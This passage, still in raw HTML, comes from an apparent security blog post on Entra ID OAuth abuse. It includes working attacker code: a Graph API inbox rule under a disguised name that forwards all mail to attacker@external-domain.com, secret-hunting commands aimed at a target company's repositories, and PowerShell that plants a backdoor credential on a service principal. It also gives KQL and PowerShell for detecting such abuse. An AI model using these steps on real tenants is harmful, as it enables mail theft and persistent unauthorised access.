plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># all email continues forwarding to attacker's mailbox</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">access_token </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"token-obtained-via-consent\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">headers </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Authorization\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"Bearer </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">access_token</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Content-Type\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"application/json\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Create inbox rule to forward all mail to external address</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">forward_rule </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"displayName\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Security Compliance Rule\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># disguised name</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"isEnabled\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">True</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"conditions\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"bodyOrSubjectContains\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># empty = matches all email</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"actions\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"forwardTo\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"emailAddress\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"name\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Compliance Archive\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"address\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"attacker@external-domain.com\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"stopProcessingRules\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">False</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">response </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">post</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/v1.0/me/mailFolders/inbox/messageRules\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    headers</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">headers</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    json</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">forward_rule</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><br></span></code></pre></div></div>\n<p>The inbox rule is invisible to the end user unless they specifically check Outlook rules. Many victims are compromised for months before discovery.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"detection-hunting-for-malicious-consent-grants\">Detection: Hunting for Malicious Consent Grants<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#detection-hunting-for-malicious-consent-grants\" class=\"hash-link\" aria-label=\"Direct link to Detection: Hunting for Malicious Consent Grants\" title=\"Direct link to Detection: Hunting for Malicious Consent Grants\" translate=\"no\">​</a></h3>\n<div class=\"language-kusto codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kusto codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// KQL: Find recently consented third-party applications</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">AuditLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where OperationName == \"Consent to application\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| extend </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    AppName = tostring(TargetResources[0].displayName),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ConsentedBy = tostring(InitiatedBy.user.userPrincipalName),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    AppId = tostring(AdditionalDetails[0].value)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeGenerated &gt; ago(30d)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, ConsentedBy, AppName, AppId, Result</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by TimeGenerated desc</span><br></span></code></pre></div></div>\n<div class=\"language-kusto codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kusto codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// KQL: Find applications with high-risk delegated permissions</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">AuditLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where OperationName == \"Add delegated permission grant\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| extend </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Permission = tostring(TargetResources[0].modifiedProperties[0].newValue),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Principal = tostring(InitiatedBy.user.userPrincipalName)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where Permission has_any (\"Mail.Read\", \"Files.Read.All\", \"MailboxSettings\", \"offline_access\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, Principal, Permission</span><br></span></code></pre></div></div>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># PowerShell: Enumerate all OAuth grants in tenant (run as Global Admin)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Connect-MgGraph -Scopes \"Directory.Read.All\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Get all service principals with delegated permission grants</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$grants = Get-MgOauth2PermissionGrant -All</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">foreach ($grant in $grants) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $sp = Get-MgServicePrincipal -ServicePrincipalId $grant.ClientId</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    [PSCustomObject]@{</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        AppName     = $sp.DisplayName</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        AppId       = $sp.AppId</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Publisher   = $sp.PublisherName</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Permissions = $grant.Scope</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        ConsentType = $grant.ConsentType  # AllPrincipals = admin consent, Principal = user</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        UserId      = $grant.PrincipalId</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">} | Where-Object { </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $_.Permissions -match \"Mail|Files|offline_access|MailboxSettings\" </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">} | Export-Csv \"oauth_grants_audit.csv\" -NoTypeInformation</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"section-4-service-principal-and-application-credential-abuse--the-admins-blind-spot\">Section 4: Service Principal and Application Credential Abuse  The Admin's Blind Spot<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#section-4-service-principal-and-application-credential-abuse--the-admins-blind-spot\" class=\"hash-link\" aria-label=\"Direct link to Section 4: Service Principal and Application Credential Abuse  The Admin's Blind Spot\" title=\"Direct link to Section 4: Service Principal and Application Credential Abuse  The Admin's Blind Spot\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"why-service-principals-are-more-dangerous-than-user-accounts\">Why Service Principals Are More Dangerous Than User Accounts<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#why-service-principals-are-more-dangerous-than-user-accounts\" class=\"hash-link\" aria-label=\"Direct link to Why Service Principals Are More Dangerous Than User Accounts\" title=\"Direct link to Why Service Principals Are More Dangerous Than User Accounts\" translate=\"no\">​</a></h3>\n<p>A compromised user account is bad. A compromised service principal with application permissions is a catastrophe.</p>\n<p>Service principals represent applications in Entra ID. When an application has application permissions (as opposed to delegated permissions), it acts as itself  not on behalf of a user. This means:</p>\n<ul>\n<li class=\"\">No MFA. Ever.</li>\n<li class=\"\">No Conditional Access policies (most are scoped to users)</li>\n<li class=\"\">Access tokens valid for 24 hours by default</li>\n<li class=\"\">Actions may not appear in user-facing audit logs</li>\n<li class=\"\">Often assigned privileged roles by developers who \"just needed it to work\"</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"how-attackers-obtain-service-principal-credentials\">How Attackers Obtain Service Principal Credentials<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#how-attackers-obtain-service-principal-credentials\" class=\"hash-link\" aria-label=\"Direct link to How Attackers Obtain Service Principal Credentials\" title=\"Direct link to How Attackers Obtain Service Principal Credentials\" translate=\"no\">​</a></h3>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"path-1-credential-leakage-in-code-repositories\">Path 1: Credential Leakage in Code Repositories<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#path-1-credential-leakage-in-code-repositories\" class=\"hash-link\" aria-label=\"Direct link to Path 1: Credential Leakage in Code Repositories\" title=\"Direct link to Path 1: Credential Leakage in Code Repositories\" translate=\"no\">​</a></h4>\n<p>The most common initial access vector for this attack type. Developers commit application secrets, certificate thumbprints, or client credentials to GitHub, GitLab, or Azure DevOps repositories  either accidentally or as hardcoded config.</p>\n<div class=\"language-bash codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-bash codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Tools attackers use to hunt for leaked credentials</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># truffleHog  searches git history for high-entropy strings and known patterns</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">trufflehog </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">git</span><span class=\"token plain\"> https://github.com/target-company/repo --only-verified</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># gitleaks  fast scanner for secrets in git repos</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">gitleaks detect </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">--source</span><span class=\"token plain\"> /path/to/cloned/repo --report-format json</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># What attackers look for in leaked config files:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># AZURE_CLIENT_ID=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># AZURE_CLIENT_SECRET=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># AZURE_TENANT_ID=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx</span><br></span></code></pre></div></div>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"path-2-adding-credentials-to-an-existing-service-principal\">Path 2: Adding Credentials to an Existing Service Principal<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#path-2-adding-credentials-to-an-existing-service-principal\" class=\"hash-link\" aria-label=\"Direct link to Path 2: Adding Credentials to an Existing Service Principal\" title=\"Direct link to Path 2: Adding Credentials to an Existing Service Principal\" translate=\"no\">​</a></h4>\n<p>If an attacker compromises a Global Admin account (via any of the methods above), they can add new credentials to existing high-privileged service principals  creating a persistent backdoor that survives the original compromised account being remediated.</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Attacker adds a new secret to an existing privileged service principal</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Requires Application.ReadWrite.All or privileged admin role</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Connect-MgGraph -AccessToken $stolen_admin_token</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Find high-value service principals (ones with Directory or Exchange permissions)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$targets = Get-MgServicePrincipal -All | Where-Object {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $_.AppRoles.Value -match \"Directory|Exchange|Mail|Sites\" -or</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    (Get-MgServicePrincipalAppRoleAssignment -ServicePrincipalId $_.Id).ResourceDisplayName -eq \"Microsoft Graph\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Add backdoor credential to target service principal</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$targetSP = $targets[0]</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$credential = Add-MgServicePrincipalPassword -ServicePrincipalId $targetSP.Id -PasswordCredential @{</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    DisplayName = \"sync-service-key\"  # innocuous name</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    EndDateTime = (Get-Date).AddYears(2)  # 2-year validity</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Write-Output \"New secret: $($credential.SecretText)\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Attacker now has 2-year access even after incident remediation</span><br></span></code></pre></div></div>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Using the backdoored credential to authenticate and access data</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> requests</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">tenant_id </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"target-tenant-id\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">client_id </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"service-principal-client-id\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">client_secret </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"backdoor-secret-obtained-above\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token 